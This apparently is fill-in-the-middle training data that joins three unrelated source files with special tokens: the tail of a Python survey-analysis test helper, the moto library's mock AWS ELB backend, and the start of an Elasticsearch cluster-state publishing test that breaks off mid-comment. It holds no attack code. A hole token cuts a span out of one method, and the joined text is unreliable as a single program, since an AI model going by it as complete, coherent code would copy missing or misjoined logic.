vk.split('|')[5] condensed_x = relation.split(":")[0].startswith('x') or v_method.startswith('d.') condensed_y = relation.split(":")[1].startswith('y') if rules_weight=='auto': rules_weight = None if weight=='' else weight if rules_weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] if xk in others: fx = frequency(meta, data, x=xk) natural_x = fx.index.values.tolist() natural_x.remove((xk, 'All')) rules_x = natural_x if condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (xk, 'bn1'), (xk, 'bn2'), (xk, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(xk, 'All')] else: rules_x = natural_x = [(xk, shortnam)] elif xk=='@': if condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (col_x, 'bn1'), (col_x, 'bn2'), (col_x, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(col_y, 'All')] else: rules_x = natural_x = [(col_y, shortnam)] else: rules_x = natural_x = [(col_y, '@')] elif condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (col_x, 'bn1'), (col_x, 'bn2'), (col_x, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(xk, 'All')] else: rules_x = natural_x = [(xk, shortnam)] else: fx = frequency(meta, data, x=col_x) natural_x = fx.index.values.tolist() natural_x.remove((col_x, 'All')) if yk in others: fy = frequency(meta, data, y=yk) natural_y = fy.columns.values.tolist() natural_y.remove((yk, 'All')) rules_y = natural_y if condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (yk, 'bn1'), (yk, 'bn2'), (yk, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(yk, 'All')] else: rules_y = natural_y = [(yk, shortnam)] elif yk=='@': if condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (col_y, 'bn1'), (col_y, 'bn2'), (col_y, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(col_x, 'All')] else: rules_y = natural_y = [(col_x, shortnam)] else: rules_y = natural_y = [(col_x, '@')] elif condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (col_y, 'bn1'), (col_y, 'bn2'), (col_y, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(col_y, 'All')] else: rules_y = natural_y = [(col_y, shortnam)] else: fy = frequency(meta, data, y=col_y) natural_y = fy.columns.values.tolist() natural_y.remove((col_y, 'All')) return rules_x, natural_x, rules_y, natural_y def str_index_values(index): """ Make sure level 1 of the multiindex are all strings """ values = index.values.tolist() values = zip(*[zip(*values)[0], [str(i) for i in zip(*values)[1]]]) return values def confirm_index_columns(self, df, expected_x, expected_y): """ Confirms index and columns are as expected. """ # global COUNTER # actual_x = str_index_values(df.index) # actual_y = str_index_values(df.columns) actual_x = df.index.values.tolist() actual_y = df.columns.values.tolist() # print # print actual_x # print expected_x # print actual_y # print expected_y # Remove xtotal from columns if present if len(df.columns.levels[0])>1: actual_y = actual_y[1:] self.assertEqual(actual_x, expected_x) self.assertEqual(actual_y, expected_y) # COUNTER = COUNTER + 2 # print COUNTER def get_stack(self, meta, data, xks, yks, views, weights, extras=False, coltests=False, flag_bases=None): stack = Stack('test') stack.add_data('test', data, meta) stack.add_link(x=xks, y=yks, views=views, weights=weights) if extras or coltests: # Add a basic net net_views = ViewMapper( template={ 'method': QuantipyViews().frequency, 'kwargs': {'iterators': {'rel_to': [None, 'y']}}}) net_views.add_method( name='Net 1-3', kwargs={'logic': [1, 2, 3], 'axis': 'x', 'text': {'en-GB': '1-3'}}) stack.add_link(x=xks, y=yks, views=net_views, weights=weights) # Add block net net_views.add_method( name='Block net', kwargs={ 'logic': [ {'bn1': [1, 2]}, {'bn2': [2, 3]}, {'bn3': [1, 3]}], 'axis': 'x'}) stack.add_link(x=xks, y=yks, views=net_views.subset(['Block net']), weights=weights) # Add NPS ## TO DO # Add standard deviation stddev_views = ViewMapper( template = { 'method': QuantipyViews().descriptives, 'kwargs': {'stats': 'stddev'}}) stddev_views.add_method(name='stddev') stack.add_link(x=xks, y=yks, views=stddev_views, weights=weights) if coltests: if flag_bases is None: test_views = ViewMapper( template={ 'method': QuantipyViews().coltests, 'kwargs': { 'mimic': 'askia', 'iterators': { 'metric': ['props', 'means'], 'level': ['low', 'mid', 'high']}}}) else: test_views = ViewMapper( template={ 'method': QuantipyViews().coltests, 'kwargs': { 'mimic': 'Dim', 'flag_bases': flag_bases, 'iterators': { 'metric': ['props', 'means'], 'level': ['low', 'mid', 'high']}}}) test_views.add_method('askia tests') stack.add_link(x=xks, y=yks, views=test_views) return stack<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals import datetime from boto.ec2.elb.attributes import ( LbAttributes, ConnectionSettingAttribute, ConnectionDrainingAttribute, AccessLogAttribute, CrossZoneLoadBalancingAttribute, ) from boto.ec2.elb.policies import ( Policies, OtherPolicy, ) from moto.core import BaseBackend, BaseModel from moto.ec2.models import ec2_backends from .exceptions import ( LoadBalancerNotFoundError, TooManyTagsError, BadHealthCheckDefinition, DuplicateLoadBalancerName, ) class FakeHealthCheck(BaseModel): def __init__(self, timeout, healthy_threshold, unhealthy_threshold, interval, target): self.timeout = timeout self.healthy_threshold = healthy_threshold self.unhealthy_threshold = unhealthy_threshold self.interval = interval self.target = target if not target.startswith(('HTTP', 'TCP', 'HTTPS', 'SSL')): raise BadHealthCheckDefinition class FakeListener(BaseModel): def __init__(self, load_balancer_port, instance_port, protocol, ssl_certificate_id): self.load_balancer_port = load_balancer_port self.instance_port = instance_port self.protocol = protocol.upper() self.ssl_certificate_id = ssl_certificate_id self.policy_names = [] def __repr__(self): return "FakeListener(lbp: %s, inp: %s, pro: %s, cid: %s, policies: %s)" % (self.load_balancer_port, self.instance_port, self.protocol, self.ssl_certificate_id, self.policy_names) class FakeBackend(BaseModel): def __init__(self, instance_port): self.instance_port = instance_port self.policy_names = [] def __repr__(self): return "FakeBackend(inp: %s, policies: %s)" % (self.instance_port, self.policy_names) class FakeLoadBalancer(BaseModel): def __init__(self, name, zones, ports, scheme='internet-facing', vpc_id=None, subnets=None): self.name = name self.health_check = None self.instance_ids = [] self.zones = zones self.listeners = [] self.backends = [] self.created_time = datetime.datetime.now() self.scheme = scheme self.attributes = FakeLoadBalancer.get_default_attributes() self.policies = Policies() self.policies.other_policies = [] self.policies.app_cookie_stickiness_policies = [] self.policies.lb_cookie_stickiness_policies = [] self.subnets = subnets or [] self.vpc_id = vpc_id or 'vpc-56e10e3d' self.tags = {} self.dns_name = "%s.us-east-1.elb.amazonaws.com" % (name) for port in ports: listener = FakeListener( protocol=(port.get('protocol') or port['Protocol']), load_balancer_port=( port.get('load_balancer_port') or port['LoadBalancerPort']), instance_port=( port.get('instance_port') or port['InstancePort']), ssl_certificate_id=port.get( 'ssl_certificate_id', port.get('SSLCertificateId')), ) self.listeners.append(listener) # it is unclear per the AWS documentation as to when or how backend # information gets set, so let's guess and set it here *shrug* backend = FakeBackend( instance_port=( port.get('instance_port') or port['InstancePort']), ) self.backends.append(backend) @classmethod def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name): properties = cloudformation_json['Properties'] elb_backend = elb_backends[region_name] new_elb = elb_backend.create_load_balancer( name=properties.get('LoadBalancerName', resource_name), zones=properties.get('AvailabilityZones', []), ports=properties['Listeners'], scheme=properties.get('Scheme', 'internet-facing'), ) instance_ids = properties.get('Instances', []) for instance_id in instance_ids: elb_backend.register_instances(new_elb.name, [instance_id]) policies = properties.get('Policies', []) port_policies = {} for policy in policies: policy_name = policy["PolicyName"] other_policy = OtherPolicy() other_policy.policy_name = policy_name elb_backend.create_lb_other_policy(new_elb.name, other_policy) for port in policy.get("InstancePorts", []): policies_for_port = port_policies.get(port, set()) policies_for_port.add(policy_name) port_policies[port] = policies_for_port for port, policies in port_policies.items(): elb_backend.set_load_balancer_policies_of_backend_server( new_elb.name, port, list(policies)) health_check = properties.get('HealthCheck') if health_check: elb_backend.configure_health_check( load_balancer_name=new_elb.name, timeout=health_check['Timeout'], healthy_threshold=health_check['HealthyThreshold'], unhealthy_threshold=health_check['UnhealthyThreshold'], interval=health_check['Interval'], target=health_check['Target'], ) return new_elb @classmethod def update_from_cloudformation_json(cls, original_resource, new_resource_name, cloudformation_json, region_name): cls.delete_from_cloudformation_json( original_resource.name, cloudformation_json, region_name) return cls.create_from_cloudformation_json(new_resource_name, cloudformation_json, region_name) @classmethod def delete_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name): elb_backend = elb_backends[region_name] try: elb_backend.delete_load_balancer(resource_name) except KeyError: pass @property def physical_resource_id(self): return self.name def get_cfn_attribute(self, attribute_name): from moto.cloudformation.exceptions import UnformattedGetAttTemplateException if attribute_name == 'CanonicalHostedZoneName': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "CanonicalHostedZoneName" ]"') elif attribute_name == 'CanonicalHostedZoneNameID': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "CanonicalHostedZoneNameID" ]"') elif attribute_name == 'DNSName': return self.dns_name elif attribute_name == 'SourceSecurityGroup.GroupName': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "SourceSecurityGroup.GroupName" ]"') elif attribute_name == 'SourceSecurityGroup.OwnerAlias': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "SourceSecurityGroup.OwnerAlias" ]"') raise UnformattedGetAttTemplateException() @classmethod def get_default_attributes(cls): attributes = LbAttributes() cross_zone_load_balancing = CrossZoneLoadBalancingAttribute() cross_zone_load_balancing.enabled = False attributes.cross_zone_load_balancing = cross_zone_load_balancing connection_draining = ConnectionDrainingAttribute() connection_draining.enabled = False attributes.connection_draining = connection_draining access_log = AccessLogAttribute() access_log.enabled = False attributes.access_log = access_log connection_settings = ConnectionSettingAttribute() connection_settings.idle_timeout = 60 attributes.connecting_settings = connection_settings return attributes def add_tag(self, key, value): if len(self.tags) >= 10 and key not in self.tags: raise TooManyTagsError() self.tags[key] = value def list_tags(self): return self.tags def remove_tag(self, key): if key in self.tags: del self.tags[key] def delete(self, region): ''' Not exposed as part of the ELB API - used for CloudFormation. ''' elb_backends[region].delete_load_balancer(self.name) class ELBBackend(BaseBackend): def __init__(self, region_name=None): self.region_name = region_name self.load_balancers = {} def reset(self): region_name = self.region_name self.__dict__ = {} self.__init__(region_name) def create_load_balancer(self, name, zones, ports, scheme='internet-facing', subnets=None): vpc_id = None ec2_backend = ec2_backends[self.region_name] if subnets: subnet = ec2_backend.get_subnet(subnets[0]) vpc_id = subnet.vpc_id if name in self.load_balancers: raise DuplicateLoadBalancerName(name) new_load_balancer = FakeLoadBalancer( name=name, zones=zones, ports=ports, scheme=scheme, subnets=subnets, vpc_id=vpc_id) self.load_balancers[name] = new_load_balancer return new_load_balancer def create_load_balancer_listeners(self, name, ports): balancer = self.load_balancers.get(name, None) if balancer: for port in ports: protocol = port['protocol'] instance_port = port['instance_port'] lb_port = port['load_balancer_port'] ssl_certificate_id = port.get('sslcertificate_id') for listener in balancer.listeners: if lb_port == listener.load_balancer_port: break else: balancer.listeners.append(FakeListener( lb_port, instance_port, protocol, ssl_certificate_id)) return balancer def describe_load_balancers(self, names): balancers = self.load_balancers.values() if names: matched_balancers = [ balancer for balancer in balancers if balancer.name in names] if len(names) != len(matched_balancers): missing_elb = list(set(names) - set(matched_balancers))[0] raise LoadBalancerNotFoundError(missing_elb) return matched_balancers else: return balancers def delete_load_balancer_listeners(self, name, ports): balancer = self.load_balancers.get(name, None) listeners = [] if balancer: for lb_port in ports: for listener in balancer.listeners: if int(lb_port) == int(listener.load_balancer_port): continue else: listeners.append(listener) balancer.listeners = listeners return balancer def delete_load_balancer(self, load_balancer_name): self.load_balancers.pop(load_balancer_name, None) def get_load_balancer(self, load_balancer_name): return self.load_balancers.get(load_balancer_name) def configure_health_check(self, load_balancer_name, timeout, healthy_threshold, unhealthy_threshold, interval, target): check = FakeHealthCheck(timeout, healthy_threshold, unhealthy_threshold, interval, target) load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.health_check = check return check def set_load_balancer_listener_sslcertificate(self, name, lb_port, ssl_certificate_id): balancer = self.load_balancers.get(name, None) if balancer: for idx, listener in enumerate(balancer.listeners): if lb_port == listener.load_balancer_port: balancer.listeners[ idx].ssl_certificate_id = ssl_certificate_id return balancer def register_instances(self, load_balancer_name, instance_ids): load_balancer = self.get_load_balancer(load_balancer_name)<|fim▁hole|> load_balancer.instance_ids.extend(instance_ids) return load_balancer def deregister_instances(self, load_balancer_name, instance_ids): load_balancer = self.get_load_balancer(load_balancer_name) new_instance_ids = [ instance_id for instance_id in load_balancer.instance_ids if instance_id not in instance_ids] load_balancer.instance_ids = new_instance_ids return load_balancer def set_cross_zone_load_balancing_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.cross_zone_load_balancing = attribute return load_balancer def set_access_log_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.access_log = attribute return load_balancer def set_connection_draining_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.connection_draining = attribute return load_balancer def set_connection_settings_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.connecting_settings = attribute return load_balancer def create_lb_other_policy(self, load_balancer_name, other_policy): load_balancer = self.get_load_balancer(load_balancer_name) if other_policy.policy_name not in [p.policy_name for p in load_balancer.policies.other_policies]: load_balancer.policies.other_policies.append(other_policy) return load_balancer def create_app_cookie_stickiness_policy(self, load_balancer_name, policy): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.policies.app_cookie_stickiness_policies.append(policy) return load_balancer def create_lb_cookie_stickiness_policy(self, load_balancer_name, policy): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.policies.lb_cookie_stickiness_policies.append(policy) return load_balancer def set_load_balancer_policies_of_backend_server(self, load_balancer_name, instance_port, policies): load_balancer = self.get_load_balancer(load_balancer_name) backend = [b for b in load_balancer.backends if int( b.instance_port) == instance_port][0] backend_idx = load_balancer.backends.index(backend) backend.policy_names = policies load_balancer.backends[backend_idx] = backend return load_balancer def set_load_balancer_policies_of_listener(self, load_balancer_name, load_balancer_port, policies): load_balancer = self.get_load_balancer(load_balancer_name) listener = [l for l in load_balancer.listeners if int( l.load_balancer_port) == load_balancer_port][0] listener_idx = load_balancer.listeners.index(listener) listener.policy_names = policies load_balancer.listeners[listener_idx] = listener return load_balancer elb_backends = {} for region in ec2_backends.keys(): elb_backends[region] = ELBBackend(region)<|fim▁end|>
<|file_name|>PublishClusterStateActionTests.java<|end_file_name|><|fim▁begin|>/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.discovery.zen.publish; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.ClusterStateListener; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.block.ClusterBlocks; import org.elasticsearch.cluster.metadata.IndexMetaData; import org.elasticsearch.cluster.metadata.MetaData; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodes; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.Randomness; import org.elasticsearch.common.collect.ImmutableOpenMap; import org.elasticsearch.common.collect.Tuple; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.ESLogger; import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.discovery.Discovery; import org.elasticsearch.discovery.DiscoverySettings; import org.elasticsearch.discovery.zen.DiscoveryNodesProvider; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.node.Node; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.junit.annotations.TestLogging; import org.elasticsearch.test.transport.MockTransportService; import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.BytesTransportRequest; import org.elasticsearch.transport.TransportChannel; import org.elasticsearch.transport.TransportConnectionListener; import org.elasticsearch.transport.TransportResponse; import org.elasticsearch.transport.TransportResponseOptions; import org.elasticsearch.transport.TransportService; import org.junit.After; import org.junit.Before; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.CopyOnWriteArrayList; import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Supplier; import static org.hamcrest.CoreMatchers.instanceOf; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.emptyIterable; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.hasToString; import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; @TestLogging("discovery.zen.publish:TRACE") public class PublishClusterStateActionTests extends ESTestCase { private static final ClusterName CLUSTER_NAME = ClusterName.CLUSTER_NAME_SETTING.getDefault(Settings.EMPTY); protected ThreadPool threadPool; protected Map<String, MockNode> nodes = new HashMap<>(); public static class MockNode implements PublishClusterStateAction.NewPendingClusterStateListener, DiscoveryNodesProvider { public final DiscoveryNode discoveryNode; public final MockTransportService service; public MockPublishAction action; public final ClusterStateListener listener; public volatile ClusterState clusterState; private final ESLogger logger; public MockNode(DiscoveryNode discoveryNode, MockTransportService service, @Nullable ClusterStateListener listener, ESLogger logger) { this.discoveryNode = discoveryNode; this.service = service; this.listener = listener; this.logger = logger; this.clusterState = ClusterState.builder(CLUSTER_NAME).nodes(DiscoveryNodes.builder().put(discoveryNode).localNodeId(discoveryNode.getId()).build()).build(); } public MockNode setAsMaster() { this.clusterState = ClusterState.builder(clusterState).nodes(DiscoveryNodes.builder(clusterState.nodes()).masterNodeId(discoveryNode.getId())).build(); return this; } public MockNode resetMasterId() { this.clusterState = ClusterState.builder(clusterState).nodes(DiscoveryNodes.builder(clusterState.nodes()).masterNodeId(null)).build(); return this; } public void connectTo(DiscoveryNode node) { service.connectToNode(node); } @Override public void onNewClusterState(String reason) { ClusterState newClusterState = action.pendingStatesQueue().getNextClusterStateToProcess(); logger.debug("[{}] received version [{}], uuid [{}]", discoveryNode.getName(), newClusterState.version(), newClusterState.stateUUID()); if (listener != null) { ClusterChangedEvent event = new ClusterChangedEvent("", newClusterState, clusterState); listener.clusterChanged(event); } if (clusterState.nodes().getMasterNode() == null || newClusterState.supersedes(clusterState)) { clusterState = newClusterState; } action.pendingStatesQueue().markAsProcessed(newClusterState); } @Override public DiscoveryNodes nodes() { return clusterState.nodes(); } } public MockNode createMockNode(final String name) throws Exception { return createMockNode(name, Settings.EMPTY); } public MockNode createMockNode(String name, Settings settings) throws Exception { return createMockNode(name, settings, null); } public MockNode createMockNode(String name, final Settings basSettings, @Nullable ClusterStateListener listener) throws Exception { final Settings settings = Settings.builder() .put("name", name) .put(TransportService.TRACE_LOG_INCLUDE_SETTING.getKey(), "", TransportService.TRACE_LOG_EXCLUDE_SETTING.getKey(), "NOTHING") .put(basSettings) .build(); MockTransportService service = buildTransportService(settings); DiscoveryNode discoveryNode = DiscoveryNode.createLocal(settings, service.boundAddress().publishAddress(), NodeEnvironment.generateNodeId(settings)); MockNode node = new MockNode(discoveryNode, service, listener, logger); node.action = buildPublishClusterStateAction(settings, service, () -> node.clusterState, node); final CountDownLatch latch = new CountDownLatch(nodes.size() * 2 + 1); TransportConnectionListener waitForConnection = new TransportConnectionListener() { @Override public void onNodeConnected(DiscoveryNode node) { latch.countDown(); } @Override public void onNodeDisconnected(DiscoveryNode node) { fail("disconnect should not be called " + node); } }; node.service.addConnectionListener(waitForConnection); for (MockNode curNode : nodes.values()) { curNode.service.addConnectionListener(waitForConnection); curNode.connectTo(node.discoveryNode); node.connectTo(curNode.discoveryNode); } node.connectTo(node.discoveryNode); assertThat("failed to wait for all nodes to connect", latch.await(5, TimeUnit.SECONDS), equalTo(true)); for (MockNode curNode : nodes.values()) { curNode.service.removeConnectionListener(waitForConnection); } node.service.removeConnectionListener(waitForConnection); if (nodes.put(name, node) != null) { fail("Node with the name " + name + " already exist"); } return node; } public MockTransportService service(String name) { MockNode node = nodes.get(name); if (node != null) { return node.service; } return null; } public PublishClusterStateAction action(String name) { MockNode node = nodes.get(name); if (node != null) { return node.action; } return null; } @Override @Before public void setUp() throws Exception { super.setUp(); threadPool = new TestThreadPool(getClass().getName()); } @Override @After public void tearDown() throws Exception { super.tearDown(); for (MockNode curNode : nodes.values()) { curNode.action.close(); curNode.service.close(); } terminate(threadPool); } protected MockTransportService buildTransportService(Settings settings) { MockTransportService transportService = MockTransportService.local(Settings.EMPTY, Version.CURRENT, threadPool); transportService.start(); transportService.acceptIncomingRequests(); return transportService; } protected MockPublishAction buildPublishClusterStateAction( Settings settings, MockTransportService transportService, Supplier<ClusterState> clusterStateSupplier, PublishClusterStateAction.NewPendingClusterStateListener listener ) { DiscoverySettings discoverySettings = new DiscoverySettings(settings, new ClusterSettings(settings, ClusterSettings.BUILT_IN_CLUSTER_SETTINGS)); return new MockPublishAction( settings, transportService, clusterStateSupplier, listener, discoverySettings, CLUSTER_NAME); } public void testSimpleClusterStatePublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state ClusterState clusterState = nodeA.clusterState; // cluster state update - add nodeB DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(clusterState.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertThat(nodeB.clusterState.blocks().global().size(), equalTo(1)); // cluster state update - remove block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.EMPTY_CLUSTER_BLOCK).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertTrue(nodeB.clusterState.wasReadFromDiff()); // Adding new node - this node should get full cluster state while nodeB should still be getting diffs MockNode nodeC = createMockNode("nodeC", Settings.EMPTY); // cluster state update 3 - register node C previousClusterState = clusterState; discoveryNodes = DiscoveryNodes.builder(discoveryNodes).put(nodeC.discoveryNode).build(); clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); // First state assertSameStateFromFull(nodeC.clusterState, clusterState); // cluster state update 4 - update settings previousClusterState = clusterState; MetaData metaData = MetaData.builder(clusterState.metaData()).transientSettings(Settings.builder().put("foo", "bar").build()).build(); clusterState = ClusterState.builder(clusterState).metaData(metaData).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertThat(nodeB.clusterState.blocks().global().size(), equalTo(0)); assertSameStateFromDiff(nodeC.clusterState, clusterState); assertThat(nodeC.clusterState.blocks().global().size(), equalTo(0)); // cluster state update - skipping one version change - should request full cluster state previousClusterState = ClusterState.builder(clusterState).incrementVersion().build(); clusterState = ClusterState.builder(clusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); assertSameStateFromFull(nodeC.clusterState, clusterState); assertFalse(nodeC.clusterState.wasReadFromDiff()); // node A steps down from being master nodeA.resetMasterId(); nodeB.resetMasterId(); nodeC.resetMasterId(); // node B becomes the master and sends a version of the cluster state that goes back discoveryNodes = DiscoveryNodes.builder(discoveryNodes) .put(nodeA.discoveryNode) .put(nodeB.discoveryNode) .put(nodeC.discoveryNode) .masterNodeId(nodeB.discoveryNode.getId()) .localNodeId(nodeB.discoveryNode.getId()) .build(); previousClusterState = ClusterState.builder(new ClusterName("test")).nodes(discoveryNodes).build(); clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeB.action, clusterState, previousClusterState); assertSameStateFromFull(nodeA.clusterState, clusterState); assertSameStateFromFull(nodeC.clusterState, clusterState); } public void testUnexpectedDiffPublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY, event -> { fail("Shouldn't send cluster state to myself"); }).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state with both states - the second node still shouldn't get diff even though it's present in the previous cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(nodeA.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); ClusterState clusterState = ClusterState.builder(previousClusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); } public void testDisablingDiffPublishing() throws Exception { Settings noDiffPublishingSettings = Settings.builder().put(DiscoverySettings.PUBLISH_DIFF_ENABLE_SETTING.getKey(), false).build(); MockNode nodeA = createMockNode("nodeA", noDiffPublishingSettings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { fail("Shouldn't send cluster state to myself"); } }); MockNode nodeB = createMockNode("nodeB", noDiffPublishingSettings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertFalse(event.state().wasReadFromDiff()); } }); // Initial cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder().put(nodeA.discoveryNode).localNodeId(nodeA.discoveryNode.getId()).masterNodeId(nodeA.discoveryNode.getId()).build(); ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); // cluster state update - add nodeB discoveryNodes = DiscoveryNodes.builder(discoveryNodes).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); } /** * Test not waiting on publishing works correctly (i.e., publishing times out) */ public void testSimultaneousClusterStatePublishing() throws Exception { int numberOfNodes = randomIntBetween(2, 10); int numberOfIterations = scaledRandomIntBetween(5, 50); Settings settings = Settings.builder().put(DiscoverySettings.PUBLISH_DIFF_ENABLE_SETTING.getKey(), randomBoolean()).build(); MockNode master = createMockNode("node0", settings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertProperMetaDataForVersion(event.state().metaData(), event.state().version()); } }).setAsMaster(); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder(master.nodes()); for (int i = 1; i < numberOfNodes; i++) { final String name = "node" + i; final MockNode node = createMockNode(name, settings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertProperMetaDataForVersion(event.state().metaData(), event.state().version()); } }); discoveryNodesBuilder.put(node.discoveryNode); } AssertingAckListener[] listeners = new AssertingAckListener[numberOfIterations]; DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).build(); ClusterState previousState; for (int i = 0; i < numberOfIterations; i++) { previousState = clusterState; metaData = buildMetaDataForVersion(metaData, i + 1); clusterState = ClusterState.builder(clusterState).incrementVersion().metaData(metaData).nodes(discoveryNodes).build(); listeners[i] = publishState(master.action, clusterState, previousState); } for (int i = 0; i < numberOfIterations; i++) { listeners[i].await(1, TimeUnit.SECONDS); } // set the master cs master.clusterState = clusterState; for (MockNode node : nodes.values()) { assertSameState(node.clusterState, clusterState); assertThat(node.clusterState.nodes().getLocalNode(), equalTo(node.discoveryNode)); } } public void testSerializationFailureDuringDiffPublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { fail("Shouldn't send cluster state to myself"); } }).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state with both states - the second node still shouldn't get diff even though 